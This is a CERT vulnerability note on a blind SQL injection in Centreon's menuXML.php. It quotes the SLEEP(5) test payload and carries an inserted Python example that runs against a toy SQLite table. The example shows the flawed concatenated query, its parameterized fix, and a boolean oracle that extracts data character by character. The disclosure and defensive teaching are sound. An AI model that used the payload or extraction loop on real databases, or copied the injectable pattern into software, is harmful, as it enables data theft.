
CERT Coordination Center

Centreon 2.3.3 through 2.3.9-4 blind SQL injection vulnerability

Vulnerability Note VU#856892

Original Release Date: 2012-12-12 | Last Revised: 2012-12-12


Overview

Centreon 2.3.3 through 2.3.9-4 contains a blind SQL injection vulnerability.


Description

CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

Centreon 2.3.3 through 2.3.9-4 contains a blind SQL injection vulnerability in the 'menu' parameter of the menuXML.php file. The reporter found that appending a payload such as '  AND SLEEP(5) AND 'meHL'='meHL to the menu parameter caused the web application to hang for 5 seconds, which shows that the parameter's value is being evaluated as part of an SQL statement (a time-based blind SQL injection: nothing from the query is echoed back, but the response delay leaks whether the injected condition ran).
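The following is an added example, not code from the vulnerability note or from Centreon. It models the CWE-89 pattern the note describes (a request parameter concatenated into SQL text) next to its parameterized fix, and shows how the reporter's payload shape turns the query into a yes/no oracle. Centreon is PHP on MySQL; this model uses Python with an in-memory SQLite database, so the MySQL SLEEP(5) timing probe is replaced by a boolean condition, which SQLite can evaluate and which works the same way. The table, its rows, the function names and the lookup logic are all constructed for the example and are assumptions about the real code.

```python
import sqlite3

# Constructed sample schema and rows standing in for a Centreon-style menu table.
# This is an assumption for the example; the note does not describe the real schema.
SAMPLE_SCHEMA = """
CREATE TABLE topology (
    topology_name TEXT,
    topology_page INTEGER,
    topology_url  TEXT
);
INSERT INTO topology VALUES ('Home', 1, './include/home/home.php');
INSERT INTO topology VALUES ('Monitoring', 2, './include/monitoring/status.php');
"""


def open_sample_db():
    """In-memory SQLite database seeded with the constructed rows above."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SAMPLE_SCHEMA)
    return conn


def menu_lookup_vulnerable(conn, menu):
    """CWE-89 pattern: the 'menu' request value is pasted into the SQL text.
    Hypothetical stand-in for the flaw the note reports in menuXML.php."""
    sql = "SELECT topology_url FROM topology WHERE topology_name = '" + menu + "'"
    return [row[0] for row in conn.execute(sql)]


def menu_lookup_safe(conn, menu):
    """Hardened form: the value travels as a bound parameter, never as SQL syntax."""
    sql = "SELECT topology_url FROM topology WHERE topology_name = ?"
    return [row[0] for row in conn.execute(sql, (menu,))]


def blind_payload(condition):
    """Same shape as the reporter's payload ('  AND SLEEP(5) AND 'meHL'='meHL), with a
    boolean condition in place of SLEEP(5) because SQLite has no SLEEP() function."""
    return "Home' AND " + condition + " AND 'meHL'='meHL"


def is_injectable(lookup, conn):
    """Boolean-based blind probe: if a true and a false injected condition give
    different results, the application is evaluating attacker-controlled SQL."""
    true_rows = lookup(conn, blind_payload("1=1"))
    false_rows = lookup(conn, blind_payload("1=0"))
    return true_rows != false_rows


def extract_text(lookup, conn, expr, max_len=64):
    """Turn the yes/no oracle into data: recover the string value of a SQL
    expression one character at a time. Against the parameterized lookup the
    oracle never answers 'yes', so the result is empty."""
    out = ""
    for pos in range(1, max_len + 1):
        found = None
        for code in range(32, 127):
            cond = "unicode(substr((%s),%d,1))=%d" % (expr, pos, code)
            if lookup(conn, blind_payload(cond)):
                found = chr(code)
                break
        if found is None:
            break
        out += found
    return out


if __name__ == "__main__":
    db = open_sample_db()
    secret = "SELECT topology_url FROM topology WHERE topology_page=2"
    for name, fn in (("vulnerable", menu_lookup_vulnerable), ("safe", menu_lookup_safe)):
        print(name, "injectable:", is_injectable(fn, db),
              "extracted:", repr(extract_text(fn, db, secret)))
```

The probe in `is_injectable` is the same test the reporter ran, minus the clock: on MySQL the true branch would be `SLEEP(5)` and the signal a 5 second delay instead of a differing result set. `extract_text` is why the CVSS vector scores confidentiality as complete even though nothing is printed: an attacker with a working oracle can read any value the database user can SELECT, just slowly.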


Impact

A remote authenticated attacker may be able to run a subset of SQL commands against the back-end database. Because the injection is blind, query results are not returned in the page; the attacker instead infers them indirectly, for example from the response delay produced by SLEEP(), which is still enough to read data from the database.



Solution

The vendor has stated that this vulnerability has been addressed in Centreon 2.4.0. Users are advised to update to Centreon 2.4.0 or newer.

Restrict access

As a general good security practice, only allow connections to the Centreon web interface from trusted hosts and networks. Note that restricting access does not remove the vulnerability: an authenticated user on a permitted host can still send the injected SQL request. It does prevent an attacker who has stolen valid credentials from reaching the web interface from a blocked network location.

Vendor Information

Centreon   Affected

Notified:  November 09, 2012   Updated:  December 07, 2012



Vendor Statement

No statement is currently available from the vendor regarding this vulnerability.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Vendor References

CVSS Metrics

Group Score Vector
Base 6.3 AV:N/AC:M/Au:S/C:C/I:N/A:N
Temporal 4.8 E:U/RL:U/RC:UC
Environmental 1.3 CDP:L/TD:L/CR:ND/IR:ND/AR:ND



Thanks to Tom Gregory of Spentera for reporting this vulnerability.

This document was written by Michael Orlando.

Other Information

CVE IDs: CVE-2012-5967
Date Public: 2012-12-12
Date First Published: 2012-12-12
Date Last Updated: 2012-12-12 12:37 UTC
Document Revision: 10

Sponsored by the Department of Homeland Security Office of Cybersecurity and Communications.